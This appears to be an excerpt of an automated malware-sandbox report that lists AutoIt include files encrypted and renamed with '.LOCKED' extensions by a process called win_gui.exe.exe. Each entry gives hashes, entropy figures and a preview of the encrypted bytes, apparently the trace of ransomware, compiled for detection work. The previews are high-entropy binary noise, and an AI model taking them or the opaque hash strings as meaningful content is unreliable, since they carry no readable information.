                                SHA-512:7EE7BC3F4BF66AEEC2A1AD025CBBC77A23B82C88D99CF946617C47A5F717236814B703B0756F820D8F460EC73B2CFDEE09327730A3E62156ADD8FDB87A74CC2F
                                Malicious:false
                                Preview:....f......=Kv...t&.K.....Aq,.@p.I.t+.....d..~..?z.{.....|..$..'$|. .8.l.^......_.P.w.%XCg../*p$Y... UJ....yn`c.$...Z.\e2.\.O...J.........l...D........B ......~..WL......u.K~50i,R.b.;.4.CF...}q....:.1y(.F..=L...'......Ku../..hr...B..l..K.....h..e.l.Gr0)y.m....V.....S .#..e...^....2.a..!N..4.....{.O@....Ca...kS8.a..TS.....s..TaLUrR...&X.}....|...y...y.r_9X8.h#....D..'..c.n..*...(...'.Lvmk..#G..\........}N..s..I...`'.P<S3.-.H....4....4...bx....L.....y..#2+mz..x.........~--R.@...^..D......}.C.....FdAr'+.J.i..j....+..uy].....A..:.8zU....:.i.R&.\.........j5.......W..@....X../.n7A.E..2.%.....g$OI.q..3.<.E...e.-.....V-Y...d..D:....eC.\.1..9l0..4.3.r.H.}...#....v...l.B@(.Lm(F..0@.ux..x..y._s3...AK>...Q...H3(.@...I.W>.......[..W.Y.v$......L.y.S.~.8.D...~..TU5..a9...!kN..[&t.U.U..\.DQ..5...k...K.A.....D.f.......S.@..s....R....,&.../.mS...H.+.~.....uL.=...e.)..O..,t.....g...'@I..9...CjyM..&.2...2...t;...LZzM.=4.g..LZb.]..i.`q.j}s...@.[.%P.9_...R.zY|."C...

                                C:\Program Files (x86)\autoit3\Include\WinAPIEx.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2215
                                Entropy (8bit):7.914268010192206
                                Encrypted:false
                                SSDEEP:48:XV9wGQY+QujhGMqariuLn15sYsaWi+z8Amf/WyYu+MAVMJg6T8jk:3QfZqyL15sdzSfevuAVO8jk
                                MD5:5CDAF28294CD49C96460F383DAAFA323
                                SHA1:DBC6B8E385DB7F3CB633A772B009B778F5DB55C2
                                SHA-256:6C28F6D6900D1AC9E377DBB390925F720D43CBEB2347FFFABB881047107460CF
                                SHA-512:E5FCBBD0578BA4A81765DECBFB7C3A1224F510BB4AC2C600933240DEEF8DF4F3E6FEEE05753A7DC5B725D34652A382B71765394D5C4E5A630C647340F28D1866
                                Malicious:false
                                Preview:.Ft......4..m.q.)j....?......vs.O.....U..=./.6w#.+3.`......3..f~....x.A..<..[.....8.A.v..a....h..2..<....({..r.....k...}=.Ko{2z.'..L* .(......=.M.z....@.V....... Ty^#........d..V.V^..J.$X.........I.1c.......Is..%..uK..*..[...PC.i.......C.z.B.S....Cn./^.n.c.1...'r.....3H3.3.c....1.=g.=_.E.f......H.\tQ.py..{.^...zM......}..n.o..@..b..<yi...e.F...=.7<..A....l.Y....YSU.U#..4{.C.-zy}=.......C. .ed.,.riGL{..9.\.k.......i....._1.]]..3..$.....g..V...c..|...mJ.....x[.(.4.........S/!.4c,..D...Z..E..}.G..Zp..$.:....{..b.W'.L.........u\.....8&.........`.t+.....N.,.e.Nr......3.+.LW.?.!1yR.Z.@.&Y...V..RKR..}.%g..k|KP.s-.L..e.*....D...l.E..Z.......Q.......&..P/.....n;&..&:...6...X...N.5@.`..:.|&""....x.k.C\-E...i.6BT.e..J.kJ.-.{%.;j...W..Y.a.......A....j..l;t...&C..Y.L{.?._...|&.'.i.h.u.$.\a.-6../.\W..}S...nyeL.4..'.'...2.1..... ...x6.0e...@.?.1....j.~#.....k..+!..|.J.....~..i^.....6...%.};e."g3.Y........`.]...6.r..X.u...-.G.~P...a..DO=h...c>VK..j...)....h

                                C:\Program Files (x86)\autoit3\Include\WinAPIFiles.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):96134
                                Entropy (8bit):7.997944598452704
                                Encrypted:true
                                SSDEEP:1536:YVTouI2r7FTe5YGFSxuoj95BLWFHd2DR+XW56Ic6er55OrYRWGuVFjQd+V:eTgKFTe5jIsoj95BLWFHd2DCW56Zr5kB
                                MD5:35E96EE34AC94F3FA9A560D086FC1E14
                                SHA1:41BF2E228A0C0D5FDE7CEE4683312E8807C283E3
                                SHA-256:2C31F2FE56E276E3A45BCCE794CB6BDF901B95CDFD5502A4D6A3CC0BC6310BE0
                                SHA-512:383289B7156D24CF52D8A231A599C373AF0055591CDE17CA7582DDFA9F2E8D3E103EBFE0A6FB70C44BC80E22FFF9BAEB46A5071C8AAE1148C4DC27826935F1F7
                                Malicious:true
                                Preview:.\....?....O#.<...B.B.yQi.y...@..7..Ep............{7.P..}...gV..x...E.7V...{...3..p)..Tg.Dg}.E.....M..E.].....zGO.A..\.k...H..1.3.!.R.....'...M.........H.....4*=/.S...a.......|_.f...Z....nb.D.@..@...s..W!.p.....p......`.HoY.^Y.1s.S_"r.o.9..1\....n.A....?........../d..v...{.j..V.."QP(...........K..*..y..1...t...9.i..J....E@[.z.....*E..j.=.0..V..l.;`.J..x\.."....O...;6.....G....?x.k....z.*i.z.^..Sy...i_,...Y....M.........=...t[{!...G....aP.oS.......S.7.*&D..I...f3.H3DC.. ..OC&..H.v'7.9#SGP....f.Z5...a.k..X?.'|Mr.T.u..Z[.........4.l..e.fX.t..d.Z..!R.%f..N....'p....`V'..k.G..* \..0...E..a.".^.2.s[..E.....d..g,u...7.C..W8kW....J.).g<.3....,.....[X....G.5...4.........O.]{.J..q[...-^&...|.vr..<d~*..|..;..d;.....>'....~K..4&:..b`..........l(lMa0,B....r?.K...y..o.,rLl..}.f.fq..X.........,S...i@t..H..J..(....h.N..9.n..w/x.{VA..O&:.. ...p.c..........1:.m0i9........1......`0....XH..A...."0.w.l....1..........u..B.ee.E..vU.`h}Zh..}xc/A!.6f...u.{!....,{hA.

                                C:\Program Files (x86)\autoit3\Include\WinAPIGdi.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):204689
                                Entropy (8bit):7.998953386038572
                                Encrypted:true
                                SSDEEP:6144:L7m5HDV3QHORlZY92Wn3zIb88zK5Tod+A:L7m5hO0ZY0Wn3zkR6ah
                                MD5:156B24A8C90C95A8C8245156958D6F42
                                SHA1:898263276E98D291A3728402DEF8290E1E104D8C
                                SHA-256:A3A5A2704F3F73ED234D4E51C92C5C93FE6464B253DF7805F02FDF98BC942C83
                                SHA-512:97082E9B1FEEACE6672154BA6FD40986033B891F764D4C49FC971C46D62F014C8943F468B409D3AEAB9BCA57112AF5974B35964F7958714081966251A6D8DABD
                                Malicious:true
                                Preview:.'...u......r.n...:....>.L@.D..-......cn....../../.2.3.+..6r.....k...4_........0q...s!....r.u.....Y.~.(........V'...@....4..Mt..KP`=y|.SOL..N..?m....|(..<...f...X,x...O..jI3..b.........0Y....K..b....h..c.......e...D..P.k...S}..V....uE.:....|.-2\...3.}....W..Q...L.......#..e.....m.3..'._.A"F...\+.]...Dr....r..(2b;........,..a=...;..o.U..|......8.\.v..e..=o".A.x..bE3c.%hc....^..@...p.......Q........M>.9.>rv.r...i9....?....z.YN\.x2S.ct..{.........k.....V*..Uj..(...6.C....q..G,0.Y_.=]k.!}....].....1..H...:dl......&C.k..{.....B.=.X<S=x~.....aL.F.tU...BG-^|.]B...9)......B.8]..]..g...S.N.....-.}w...jq.#.:..q..c.z:}G.p.-..s1..E.k.d..3.4I).m..5.F.pg..6..&L#w3.R..>i....6I......}LD.[...DG.V.....=.Vn..^........$....kf...Z. ..M.G...f<?..v.N....q.}.G.....%g\../.Z....A..V..(.f..K.S.....A.w:.....^...s4U.M..r..;.$.@....../wv.e........l.o.E.....5KU..i(>.3.y.M....85..j.......qN..R.._..7..U..ou...D.4BX..9]......^.G.V..M8........I...7..(...l...CB..W........Q..]

                                C:\Program Files (x86)\autoit3\Include\WinAPIGdiDC.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20569
                                Entropy (8bit):7.990741444866277
                                Encrypted:true
                                SSDEEP:384:5irAwJ+H64sfscmTYYEMILyadMuwp1ygVRMTINOar/AW/dEdZXmWbTStUU4nm4W7:srFi6RfHmTfEMI15wXygHmM/dEdZxTSv
                                MD5:037D346EF8654808A016C1D362C7EC50
                                SHA1:EE25CA72B04D2B9D31B5C661529E23F93490CF95
                                SHA-256:EEBE2BC788F6BD503F6286B5F0522466D00C09A8F5E7CB45A826B31CBC0E1CDC
                                SHA-512:759BF0D8DF0BF514C89B77095569F1AAF8C059B1D9AF126B23A33E39BA91E36141419839C1A8E81564FA5584B7F60618111B444B37E783C0F0ADE53B2A9126F4
                                Malicious:true
                                Preview:A..Fn..yV].|..YT]q6..*,........q..s...Os..........\!.@.c.....eE.z;...O...y.jd........0...?.n...h.[.x...."..h.3..".eR..~.=Z...n.....>....#eA...1..~.......6ta..Q..z.....R..)~i3.)G.!:p.].aBuo.u..J....j4c&...yR5.[q..09..Vc.kp...?I&..p....u.Rr...m....f.Cp8*.....xd.ED@...g...4Fd.....F.......gD.02. .<..m.$M.Q.x.-.l1p..".[...K...m...Z..i.u.-..c.7X.*..@.. ...b....X....../.N..6..!..Z....a..D....k.D....M.{9...D..n.0h_...4.x``....Z.q....,..7..KD...P....,........N.^.m....[..B.......).s.37.4.@2.t..#..{V@<N..@.....0.d...g..O(..h..-.. ..D,[t....E.oX.....S.....B_o.o..W....h....<....gwv.0?.qn.3...x.z>..y....m.a!od....-sP,4.z7.....X/.wB..'`...2..A..c@.b..N...?..G}..D./.e_..N..r....v...d...v.(.+xY..%)+..?..X..bj....95(.QJ....{.gx........=VA..'.y..Xd.....O......0..v.....Y.q}..t...EIc..p.8.......t..tq..X..j..2S.h..(.4J......?.:`_..2..%;.7p$.J.....+.fg.o..n....>.234..&..=.s..W..1..(.L@r....A.-....?..cl..<.......Q....D.-...u.c$......E..*.3X.A....".. .

                                C:\Program Files (x86)\autoit3\Include\WinAPIGdiInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30134
                                Entropy (8bit):7.993583297375008
                                Encrypted:true
                                SSDEEP:768:dkuqDArppbKd9O+LZztnF9cIy4Lckx/2Iewn882ryUC7WMac:HUAryvOEvcl4LivM882srj
                                MD5:4CDA38949198BAE427B720A3899850A6
                                SHA1:DAA6530A920CD68683C01414E5AA48384139A68E
                                SHA-256:1A02D43714B8890FE8323F2B071EFB3125C276438ED84E9B9602D51DA6265119
                                SHA-512:954C530A79FB09FEC1DE5A2CD436E2AE87BF45FCAC7240E99C82F0B99509D4EF53FFE5ED856733A600C0707368B4F6135CEDC8F1F9F5314053D89056EFFDE202
                                Malicious:true
                                Preview:"../,..\yVd-*Z.s..p.3...q........T.Rr.^..}...Y..I...q.....9_."..#.?V.1.}a.gi..R^.4=d...+.0..+...MH.,...&..i....u...U/.....lr.p..n.r....5L...L...P.h...o>W.L:..:.w.1.!./0vM.L..I..h..m...8*.. ... .&...d..%....Noq.S.g.c..w..<..%.O....1.*.u......Nlot.....Owq...<....hd.p.Y..].s.s...2...c...)..>...(.....B.../4u.W.U}......n.E;...j.l2q$Tb.2P.AN..Z.Mqu}....E...D...;...h#..B..5?....gZ.h.&.9n.w...Q1.Zv...e.p1P.Z..C@>+Y...4...1./mb.{.]....R,p....Z.y..S]...I.@....-O8....).".;~.OB.i_.0....(S..;w....QZ.m..>hYV(.....P.&0{|...K.v........*..be[Rg......P.Y..^..D.d.<.....,G6....T)&R..<.<#..3qZ.`..{...,4>l".c....a.q`...y...).^..._. .1..X.;c.qo.b.E*{.kbi..6F..k...0..&8.Dj.z.%."2&.z...}LU.l...1k%......[lf...2.X.......r?.%x....;t.......6.eQ....Ly...aq..r0...,.c.v........F.j..C.....%.)..b.....O..B.ou.q".W.l...>$).. ."jo...Q...\....iJ.\7.L..K."}.."......lP[./....L'..\...y8).!......M..'.?.70..._...............q..^.........v. .?.,.AR.i.&. .d....a..1.t..K.@[..1..

                                C:\Program Files (x86)\autoit3\Include\WinAPIHObj.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13689
                                Entropy (8bit):7.985370118783377
                                Encrypted:false
                                SSDEEP:384:J+zEWzJgt9Zv+NCIeuGZWkoWn5dcrwWMyNwr+VOe:aHgt9Zuv3Vk3n1y4K
                                MD5:6702A4DEA1D88FAACE2FB7E7A7F399BD
                                SHA1:AEEC92DEB58C6B6FB5C6524949814C85780D387E
                                SHA-256:0FA92F9F0FE495D3F92A8956447DE2C06571AD77D4830D94AF548481F3FC85A0
                                SHA-512:51773BF2D327B9827C5386A03FB6C37BBEC289834ACEA17CD3C36111922ED61F2CB795D87BA6FFC25DE30239DE44B78DCE1A1FFAB1632855A0CCDCE156358FAB
                                Malicious:false
                                Preview:f.F.6..._g..d&.Yi........'....K...F......7.rd,'L..\.j-.9.A...89.Y..;E....K......*..w|..].V..aJ......~.x;G.F..U.."xO..m.NBt..U..:v..r.8.../...w...:)..@Q..:.....x...fT.4.&xQ.....y...Qx.*.;SW..UB.q..<..Ha...\5..-....h7....W...i.\...f.Fs....uV.l.]..X ....<v.g..,..Uu..w..+....B.?..N}..,...4...9 ..>aa~Q..m=..e..;.Y8+.R.+..'[.,...yfx....V..=....n.zM..v./...0..%....../..#.CZ5..m..yVZ_I.:H!.fG.d..V.<..N&...H.y.h.v..H....z....I.r+...5.+.y.....:..+.b.&.V...GKa7.Tyf.g...._..NU|...!.........Rm..........,.M.<$4..'.7K...~..B.*o7CILY.(U.9c.*.:7.Vy..2K,f..M.........6..oogg..])N.Q..;.v...v...|....~..JDC...x........Lc..Z...$.[t...k..AFT.[........o+..Z1^gn.....9..$B.......-.......'z.~WE...e....V..Du..]`.[.v..DTl..g.L.B...}-.*......".1....N.,.Y0..@.D.m....r.&..-...G6.."jdE...+c..H.^.2.*.0...zs>_...F.....T.?.}.i-....o........E.@.3.A..m..e..N........k..+3*....J..9..7%.....V.....a.._..].>..E..s....G.M...k.i._.?p.._?.-.:..P.y.g...9.m...#..Cj..<.....<@K)..*..

                                C:\Program Files (x86)\autoit3\Include\WinAPIIcons.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26096
                                Entropy (8bit):7.992708898630628
                                Encrypted:true
                                SSDEEP:768:tUKdDAbw1tAZMfJxkAhb4hNiRNOB4J4EF1O:RKZKCiRNB4u0
                                MD5:E2711AF78977AE8B8D1273A354AD190C
                                SHA1:54849E75FA095A1F1A304B911EC5CE39E2ED81D3
                                SHA-256:DFFEDD1F52DF1D3049221E63407C1703E05D95152688212065F9D808B89B72A8
                                SHA-512:6B7DC28CAADF0295DE7178D0A32BED2BBDBBE5D28FE176D4AF31EF378CAC17A22681BAFA0512CC23AF601D2FD4FF7B3491255C2B10417A2C3FD11E8CE0A469A9
                                Malicious:true
                                Preview:.3..g(...<.:*..;.....V..!h....4N.}..7....[..Ox....W.w.j......(Q..[...2..V.I.;..fV.Kq).R.Qr...I...JY...W.&..x.LU.O.e.vv.).n.Z4.;.j.q..':.k.B?j..t_t...i.8.N...7..?....Eva...V_..\?.h......MM..L....~b...9N.....L>\./:.....j..X.^.....sf.....MW......W"....3.D...E.SiMzp...n"..DC...p.7TW........p.d........1;^I......4......{J.Z..Y^.r...t.Jz.]R(.d..'`n.@..u0v.i.U...x....j...o..>.J......K....MH[-D..N(J...;.7,.p.ODqJ.wM9.....3.\.3.],...Y.dL.S...@.rc..G]".>T.T...ZJ...FL.9,........9D..G..;..a..k'.....$.G..Yi.Y..O._..@.VL....!..Y..Z.....-....|...K...-y.M2...}s........[.[p.(...L<.}..)W/(!-.y.../.....@....-q...\.m...c<.l.f.Q|M..G..A._Bo..1K.5V.....S.....I..]]5k..3.....yU[R....i:s..H.A......xh..-.M/......c.k...=SO..H..r.q..D.q.."..qK....W~[J./..q....5>....[?...a.+L.....Tg........i.v...c..... aV...~o...g.k..s4..t$..!.e...w...lqYI...1Z....@......E.n}.,...v9....."..j.v...0.....rAz.......d.B.[.1..8.|..}'..7`M..k@Rh.I.b......cT.Kg....(.....[..=..-..o..{...

                                C:\Program Files (x86)\autoit3\Include\WinAPIInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):18613
                                Entropy (8bit):7.99099778930684
                                Encrypted:true
                                SSDEEP:384:ZD5w+V2HJMhEJYcFLoVBF480N5f/3DWddYhlAsbUY3Gqn+VOd:ZD5xKJMhEJYcF+FofPDWohlAsbj2qnp
                                MD5:FCE0FB8FBAFC127C8960D7EE922B238A
                                SHA1:D20FA5772C47FA227F32A6A1E1A9B9AA894E6214
                                SHA-256:A01617ABDBC74E0634AC99772FE017329C3AF5E2236B536D101FBA928D211CA1
                                SHA-512:98C43DB8018628233B6BE057EA9EE37C26A077E53187F28486F75ACF2BE8F7B30604B29492196386462AFBC9C83F50B3F0DCD97C32ADA2F480074374305F616A
                                Malicious:true
                                Preview:.......-x..T...a?G...2.Q..J.k.IX...-.F}..D..oD...EZ...hO[...X......ch.U.9..N...0.!....X.....x.~y_..l/.J.~....'.9........}.......s.9.zx.....a]?.t..Q..'....-.7E..H.VS0...+&..G..y.R.>..16]..QQe...#.k.,.Em..|..)S/..+....S...~..]02.+mF...k.....=....B...I..Yx.~(.%..^ZWk..sa.P....8....*...R8.."a....].....D."..Uu8....p~3.bC9.w..^.X.%!S..%:J'k........p..~#.JcJUE...YK........V.|()...@e....5(f...i.x...qb...'.&#@$.D....e..*=.%4.~.....\.I.2...K.G|..+M...b......F."......../!.v.5.hf7.L....]*......>..<@..&<1....+..H."U.......)I/..._....JO....e.Q~.....C.$...u....j.Ku6....fc*-.|\<"|FI_gf5.4.$#.+pE..Ky..aL...ao.`.A4.@jv^.=.1.l.T....K..!P..*....._.....(.-+o^.DT..h..u..,.+D........0..`&b.!.N..#..Mal.S....`e.....Z.S)....8M.8...5"1..w...._s.q..U#.<....P&.0.?!:...tx1.......E.IG........C].....0.bi...GQD.,.}.8..Qn.0...r.o..^.Y.o..?.k..].amyE$4.i...!...}*.-....i....mP2..|.".6.......Q........|4..2sQ~..d.:g.G..._...hm........1....]H.^..B.4w...`Sbl....0..v...}....

                                C:\Program Files (x86)\autoit3\Include\WinAPILocale.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):21307
                                Entropy (8bit):7.990746048928715
                                Encrypted:true
                                SSDEEP:384:fo1Mng0tI4HnpW58VH2q75U0YlDe6Ba1ub1LSyH8rdf2W0jnOBb5FSDdxLpGn+VD:foP6jHnpesv14DY1U1LSok2WpBbHSDdV
                                MD5:1F60FB3D3679410747377F1FBB08A5F5
                                SHA1:84EED593DADFB4D0704F0DF436CD46CD3DA1471F
                                SHA-256:CB064730E6D2D3B36120C8E679FE7F31EF5390CD887BCC571A3B6333ACB42AF8
                                SHA-512:B7C3D94394D3D81F6ADCDAA17488F9D34FDBEF6102E45F222AFDBBCAD5E58B8110535CA68B3E0FC67ED6A3DBD8CF911537E0D7E76460552496CF042CFEDCDD9D
                                Malicious:true
                                Preview:O.P..LoC.r...u......S08....._.p..b....K/..j.....-.?f.:.......B.Hy.^+hX....c../.RcM.;..!U.`..i..&.....O@...M.4G..[..+..9D.jDN..^..L...D..J...@D.0w.eC.C..wj.H...1n........5Dy......S+...O>...H..p..5..b.P"2.L..X....A..O...o..7.~[.p..7.X.Je...VA..?g.7)).z.N.*1LNW.............Y"!.SGl. .....[..1.]u.....m..wS))e\Z.,.K.....}..O[...-.s.eig=...hKmz.b._.9P4..^....I....p._94.Q.n;,../...v`'3T..H8.!\..l...:F..CW>S7..Qw..*XW..n.|..J^H.%g86..s&....,w....Q+...t....V....<K.6.9/N...x.H<gw...T.7.W.\..r].........z...{.j..q..'@d'...p...pvY6"..K.:^.a..M.|..9.....Q .<.I8.9Sq.gG.x:.Eg.|Yt..... q-..D..@N..L...2.N.0..DO.....ygRegq[..3.W.R..r..*Gn.].F...K%...3(.V...#..#'%.E.. ...X..n...i..Vx*.Q|..<R....M,.?..>..O.s..`$.Le...c8....[.......cY.h~...bw.:..;.?.q....F...^.6.!..EX.OF.......[Mp..hE...B.zA..G.(.L...+J.!..(..(......FB...@.I.(Z........-q..I.V-......>9.....<.8agrt....2~..]................E2.W.K2.lM.f..`..&....7....... Jw.j.5ZB.#J.%.g.W.<Y.....l...:[...@.|.....7.gI.

                                C:\Program Files (x86)\autoit3\Include\WinAPIMem.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22118
                                Entropy (8bit):7.990206503294256
                                Encrypted:true
                                SSDEEP:384:TGzXDsB7zDlznHUyfbAdQ9Dl0ErrAy0ZMvz2PiMl9vDFcDJBr+eUP7S4BruI+hlF:TkTsBdHUyfbAdQXfws49vACVP3BruXPF
                                MD5:9753376BA3F73A2A0B39B0F14DD0A397
                                SHA1:3F487AC1EDDD574F5188E765AEF8E85C7AC9A966
                                SHA-256:85CA1977149AF1B2A0956553CD3FDE64221BC162DE62066154120107621E2D8F
                                SHA-512:A36F563B5E15EC959607FFE01D742720CA56C7766DCFE5C0B4362C96D8C1B9B0498E3496BBDEC604B445C5FCC99F9EF589757442A162B80453522745CCAA6D71
                                Malicious:true
                                Preview:.s-....N+.N..!..v...d.8..V.q.... ...<.Nzbs...V.S.=.....3b.~!....kmV.$...DH.o.vf./S.........C.ca.....K...j.U.....q...1....j:.W....O..D..m,R..U..,.\.......F...ig...Ww..qX.k...1..8T5h..XfDWT,{.z"..q..'&..s....:.(....D......h...R.......*/._.D.bB....gWz.c..........9>.9....Z..!!..l...M7.5SX........:.6...>.1.'y.U.[Y.N%N.....=.P<....@..`O'p!.e.h .x22.G..g..m.D".....a...uE....?=.4y..8...)IY..t!..v........L.Z..U.D.e....m[..G.L$.m&..Zp3x`.3y.3....=.@.'< 6..'D.A.b./........#..wj..w..~S(.4.w..Y..k!.V............`i.7p..e.w..F...3.".*G3.V..MN.@.\K.....#.6V...J..=i..Z.[.j.j.k.5. G.+.lK~\....K~;\I.z........[.<....K.....W`ar..a..T$.r.'.pV.zA.=.....X...N.`...N.i=.p......\..s..?.+Z..(,y.pE.......<...F.l...cy.63........}..<&w.y*.s.tE...oc8.!{5....J.%.,.I..Q....PJ._4.+...U...i.LoE...z............I....V..`.............H.7..........i..\../.D..z..3..]v.#c.gS.P`.b>..-.....)D8........$.B.............J...&...'.....l/......}..(..|.f.|:.....LJ...#..5._7..!.

                                C:\Program Files (x86)\autoit3\Include\WinAPIMisc.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14831
                                Entropy (8bit):7.987045338436014
                                Encrypted:false
                                SSDEEP:384:fsngrTVXsni/rWBSFTmHeN8qMCfWI/rTSfKAPxu2+zZ+VOP:RtsOrW+qHPqvOI/fEKb2+zZ7
                                MD5:69604DBC1506C4A3224D024C2158ADED
                                SHA1:09169F93CA1E75C60B6E83DC9C753F4E415BCE02
                                SHA-256:ACFE38285286844888286D48484F37460038EFEA5196AD8908DC181D3024D572
                                SHA-512:C5973E947E4E1BB62B335C68B5E510368C81F51F1DDE5A9D161BA095F802E9659ED223BAD4FB9627F69DA100D8655950F55B551222813C9EF976DEDB50D270F1
                                Malicious:false
                                Preview:v.B`.....]...F........x.O.-..}.`..[d6.......pzb.Z%\6S8......!b...../9U.$..Wt..]o..9....Ub.L.&s.....).Cq.p......<.t....o!......EI..H..9..#vXs.J C.......Y..i....|h.o.(.9.O..."2..}...Qvm...{f.k.......7m.E.;../9..L...|...l....#.(so.*~`"oR..c..E .......Qe..k.. .s{....S..L..p.{./...*-..=...C0.%..#..{..~%.`H"+....)..J....a..>....ok. 9...f.../..~.).\`....7.C.5..Q...#h!...uS.?xt.C.:....`...../Vd..CM...W.h..]C...8.V.].d.....n.....:x.(W.oq+}3..Z.........`.8r.....H./.........2...$.N.R..F.KP.fC:...P .......V..}.....ke.leDa..{H.6.J....K..h.........2..!..`......W.{.65.Y.C.9.m.U.%..1.{u.....I..:TkR.}b...........u..f..u..w..y.....x......v]QB.q9.}.K./Oq.9....eD+...=T(.."..y..2v.....a0> .]...n./.Wg.....<...1q.......t..cE.y....j.SR.(..d.5...........5..l...-..,..s.Y'......#.D.U.....[....3/y`#.....A...xD..F...7T...yw../xCA.}....].....m..G,Zcr..T.r.....O.O..O.[.fm...QX....CB....L.@.D;B...- 06.F{X..?....`x.'E....^.....p]...nF.j.?......N.Y.6>....ze..0..Qs

                                C:\Program Files (x86)\autoit3\Include\WinAPIProc.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):77237
                                Entropy (8bit):7.997643885981981
                                Encrypted:true
                                SSDEEP:1536:V5TUm4BbwyLpZD1awVeWSgecQ5MF0iHVd0sN2rz0gWTu9PkbsyKDeqXY4:V5TfGAdXJ55MF0iPdsrzAuNcKDeP4
                                MD5:7346C9D2EB98AC1075346703DECC8928
                                SHA1:1D26E6E6866C90EBA8EA72432C10236783F81FB2
                                SHA-256:7ABC1C0465643D5EFC880C750C81FA5867C7F52EE30C3C0A5526DE468A966A87
                                SHA-512:82E9BE820F0D6945BE604C751833636E3FECD9A5C3C37FF5563CFCB49120EC2D5F61043641756283CAE3B89B9352B2C454977BF69186CEF5F2DA7324E03B37D2
                                Malicious:true
                                Preview:...[...z...^....Z|....cp'..@...!.p...G)..5.1...b......N..;./.8u.b.5.......6b.j....d..sL.B..T>...pM.NF8.5.r.}...?....._................8#m._b.8.1.B.....W.e....t}.,...K....7.......|4..T....ps!N!.].(....#Z.z....@<.....y.O.._.I.....Q.....p.&..P......#.....x...7....{......._.).....N....&.'D..~.J..\Ea.j....{.'tV.wq.%.{.1.pT#=f.np."l...t5q;.<.-.....%..9..p".D...<..'ix....m...........>}..........O..B..3N....I...O...V...wG3.JL$L.$A)....O.2q..3.:....AQ. .3RY.......f......3.z..].%<H{........k..."E..GnV].f/WoK....s.>...r..N.._.'..?....-......4..`.......alZ.%.6.T..&*..,P.`.#......?<...XO..-.n%i\..G#.=...P......<.a*....K.....Y0f.%Q.P7|..U8....|3..c..2.g.-.$.b......(.=.....m....7w.`GV..u${D./.C_...4.....C.q...i.pg.N..p.7|....3(.gP...E..j....k.i..*..,W.....R6#....{.~Zs..>.R..._...I?.g.`...M@.L..jn.,...q..2........T..c2.._......C^.t%.8Mc..y&...+...g..Hd...^..U......W..+......^p..A ..6H*...Y)qv.2.z.b..O.@....:hpn......`d.[...Hs+...?.T..Z./}..L...s

                                C:\Program Files (x86)\autoit3\Include\WinAPIReg.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):35679
                                Entropy (8bit):7.994921127201841
                                Encrypted:true
                                SSDEEP:768:3B0wgAmKWDgjLyOrqFl2CMgBEE2xQFCX5aymigojkPHVPaq1:NJkgj2Qq0Y70QYwymR1L
                                MD5:C70F74B728F81348721FF3A5F0E7F7D3
                                SHA1:1362BBF0A5B3CB02916F044DB7450D4EF2779849
                                SHA-256:A500DE3C420FDEA4721CD03F67E4DD7F97ABEA28D6DA729ECAB8F27C0D59AAF4
                                SHA-512:BD71CC39EF3E09CF3EB05A41503C379ABD9FE82F7282558457121CC0A710428399CABF283473899FE7BA0CDA92537BECA64418F371BDBB8FED951DDC34020E7C
                                Malicious:true
